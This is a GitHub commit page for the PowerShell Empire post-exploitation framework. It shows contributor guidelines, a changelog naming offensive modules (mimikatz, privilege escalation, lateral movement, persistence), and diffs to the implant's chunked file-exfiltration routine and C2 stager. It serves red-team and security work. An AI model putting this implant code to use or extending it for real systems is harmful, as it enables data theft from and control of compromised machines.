correct conflict in changelog

EmpireProject · Mar 31, 2016 · e43fb94 · e43fb94
2 parents 578f93f + 791071c
commit e43fb94
Show file tree

Hide file tree

Showing 69 changed files with 10,792 additions and 2,378 deletions.
diff --git a/.github/CONTRIBUTING.md b/.github/CONTRIBUTING.md
@@ -0,0 +1,30 @@
+# How To Contribute
+
+Contributions are more than welcome! The more people who contribute to the project the better Empire will be for everyone. Below are a few guidelines for submitting contributions.
+
+
+## Creating Github Issues
+
+Please first review the existing Empire issues to see if the error was resolved with a fix in the development branch or if we chose not to fix the error for some reason.
+
+The more information you provide in a Github issue the easier it will be for us to track down and fix the problem:
+
+* Please provide the version of Empire you are using.
+* Please provide the OS and Python versions that you are using.
+* Please describe the expected behavior and the encountered error.
+  * The more detail the better!
+  * Include any actions taken just prior to the error.
+  * Please post a screenshot of the error, a link to a Pastebin dump of the error, or embedded text of the error.
+* Any additional information.
+
+
+## Submitting Modules
+
+* Submit pull requests to the [dev branch](https://github.com/powershellempire/Empire/tree/dev). After testing, changes will be merged to master.
+* Base modules on the template at [./modules/template.py](https://github.com/PowerShellEmpire/Empire/blob/dev/lib/modules/template.py). **Note** that for some modules you may need to massage the output to get it into a nicely displayable text format [with Out-String](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L111).
+* Cite previous work in the **'Comments'** module section.
+* If your script.ps1 logic is large, may be reused by multiple modules, or is updated often, consider implementing the logic in the appropriate **data/module_source/*** directory and [pulling the script contents into the module on tasking](https://github.com/PowerShellEmpire/Empire/blob/0cbdb165a29e4a65ad8dddf03f6f0e36c33a7350/lib/modules/situational_awareness/network/powerview/get_user.py#L85-L95).
+* Use [approved PowerShell verbs](https://technet.microsoft.com/en-us/library/ms714428(v=vs.85).aspx) for any functions.
+* PowerShell Version 2 compatibility is **STRONGLY** preferred. 
+* TEST YOUR MODULE! Be sure to run it from an Empire agent before submitting a pull to ensure everything is working correctly.
+* For additional guidelines for your PowerShell code itself, check out the [PowerSploit style guide](https://github.com/PowerShellMafia/PowerSploit/blob/master/README.md).
diff --git a/.github/ISSUE_TEMPLATE.md b/.github/ISSUE_TEMPLATE.md
@@ -0,0 +1,13 @@
+## Empire Version
+
+
+## OS Information (Linux flavor, Python version)
+
+
+## Expected behavior and description of the error, including any actions taken immediately prior to the error. The more detail the better.
+
+
+## Screenshot of error, embedded text output, or Pastebin link to the error
+
+
+## Any additional information
diff --git a/changelog b/changelog
@@ -1,11 +1,58 @@
+============
+3/31/2015 - RELEASE 1.5
+============
+-Encompasses all changes since the 1.4 tagged release
+
+
 3/31/2016
 ---------
+-Merge of Inveigh 1.1 update and privesc/tater
+-Updated of Invoke-Mimikatz.ps1 source
 -Updated mimikatz dlls to version 2.1 alpha
 -Included modification to suppress cmd.exe when spawned via PTH.
 
-1/17/2016
+3/30/2016
+---------
+-Added loading of external modules with 'load /path/modules/'
+
+3/25/2016
+---------
+-RESTful API modifications
+-expanded agent/server epoch check to +/- 12 hours
+-stagers now run -sta
+
+3/24/2016
+---------
+-RESTful API modifications
+
+3/22/2016
+---------
+-added auth to RESTful API, additional API fixes
+
+3/21/2016
+---------
+-start of RESTful API implementation
+
+3/19/2016
+---------
+-PowerView.ps1 update and multiple related module additions
+-added github issue templates
+-added situational_awareness/network/powerview/get_gpo_computer
+
+3/11/2016
+---------
+-added privesc/getsystem
+-bug fix for Invoke-PsExec and some x64 pointers
+
+3/3/2016
+---------
+-first pass at stager retry interval
+-download chunking modified
+
+2/17/2016
 ---------
 - '--debug 2' now displays debug information to the console as well as the empire.debug file
+-added privesc/mcafee_sitelist
 
 1/15/2016
 ---------
@@ -21,11 +68,13 @@
 ----------
 -Corrected several bugs in how the workingHours window is handled in the agent
 
+
 ============
 12/29/2015 - RELEASE 1.4
 ============
 -Encompasses all changes since 1.3.1 tagged release
 
+
 12/29/2015
 ----------
 -Added situational_awareness/network/powerview/find_managed_security_groups to integrate @stufus' new code
@@ -121,16 +170,19 @@
 ---------
 -Fixed small bug in TASK_CMD_WAIT response parsing
 
+
 ============
 10/30/2015 - RELEASE 1.3.1
 ============
 -Updated reflectivepick dlls to fix bug in injection and dll payload injection
 
+
 ============
 10/29/2015 - RELEASE 1.3
 ============
 -Encompasses all changes since 1.2 tagged release
 
+
 10/26/2015
 ----------
 -Fix for psinject bug due to lack of .NET 4.0 on target.
@@ -168,6 +220,7 @@
 --- Six new modules and WAR stager added, /sids option added to golden_ticket
 --- Fixed international locale bug with unicode text in agent.ps1
 
+
 8/29/2015
 ---------
 -HMAC algorithm for packet comms upgraded to use SHA1 instead of MD5
@@ -215,6 +268,7 @@
 --- Ability for agents to die after certain number of failed checkins
 --- Added ability to easily remove "stale" agents
 
+
 8/15/2015
 ---------
 -Added modules management/timestomp, trollsploit/process_killer, persistence/elevated/wmi, situational_awareness/network/smbscanner, lateral_movement/invoke_psexec

diff --git a/data/agent/agent.ps1 b/data/agent/agent.ps1
@@ -668,12 +668,45 @@ function Invoke-Empire {
             }
             # file download
             elseif($type -eq 41){
-                try{
-                    $path = Get-Childitem $data | %{$_.FullName}
-                    # read in and send 512kb chunks for as long as the file has more parts
+                try {
+                    $ChunkSize = 512KB
+
+                    $Parts = $Data.Split(" ")
+
+                    if($Parts.Length -gt 1) {
+                        $Path = $Parts[0..($parts.length-2)] -join " "
+                        try {
+                            $ChunkSize = $Parts[-1]/1
+                            if($Parts[-1] -notlike "*b*") {
+                                # if MB/KB not specified, assume KB and adjust accordingly
+                                $ChunkSize = $ChunkSize * 1024
+                            }
+                        }
+                        catch {
+                            # if there's an error converting the last token, assume no
+                            #   chunk size is specified and add the last token onto the path
+                            $Path += " $($Parts[-1])"
+                        }
+                    }
+                    else {
+                        $Path = $Data
+                    }
+
+                    # hardcoded floor/ceiling limits
+                    if($ChunkSize -lt 64KB) {
+                        $ChunkSize = 64KB
+                    }
+                    elseif($ChunkSize -gt 8MB) {
+                        $ChunkSize = 8MB
+                    }
+
+                    # resolve the complete path
+                    $Path = Get-Childitem $Path | %{$_.FullName}
+
+                    # read in and send the specified chunk size back for as long as the file has more parts
                     $Index = 0
                     do{
-                        $EncodedPart = Get-FilePart -File "$path" -Index $Index
+                        $EncodedPart = Get-FilePart -File "$path" -Index $Index -ChunkSize $ChunkSize
 
                         if($EncodedPart){
                             $data = "{0}|{1}|{2}" -f $Index, $path, $EncodedPart
@@ -699,7 +732,7 @@ function Invoke-Empire {
 
                     Encode-Packet -type 40 -data "[*] File download of $path completed"
                 }
-                catch{
+                catch {
                     Encode-Packet -type 0 -data "file does not exist or cannot be accessed"
                 }
             }
@@ -862,9 +895,10 @@ function Invoke-Empire {
         # calculate what the server's epoch should be based on the epoch diff
         #   this is just done for the first packet in a queue
         $ServerEpoch = [int][double]::Parse((Get-Date(Get-Date).ToUniversalTime()-UFormat %s)) - $script:EpochDiff
-        # if the epoch counter isn't within a +/- 10 minute range (600 seconds)
+
+        # if the epoch counter isn't within a +/- 12 hour range (43200 seconds)
         #   skip processing this packet
-        if ($counter -lt ($ServerEpoch-600) -or $counter -gt ($ServerEpoch+600)){
+        if ($counter -lt ($ServerEpoch-43200) -or $counter -gt ($ServerEpoch+43200)){
             return
         }
 

diff --git a/data/agent/stager.ps1 b/data/agent/stager.ps1
@@ -67,7 +67,10 @@ function Start-Negotiate{
     $p=(gwmi Win32_NetworkAdapterConfiguration|Where{$_.IPAddress}|Select -Expand IPAddress);
 
     # check if the IP is a string or the [IPv4,IPv6] array
-    $i+='|'+@{$true=$p[0];$false=$p}[$p.Length -lt 6];
+    $ip = @{$true=$p[0];$false=$p}[$p.Length -lt 6];
+    if(!$ip -or $ip.trim() -eq '') {$ip='0.0.0.0'};
+    $i+="|$ip";
+
     $i+='|'+(Get-WmiObject Win32_OperatingSystem).Name.split('|')[0];
 
     # detect if we're SYSTEM or otherwise high-integrity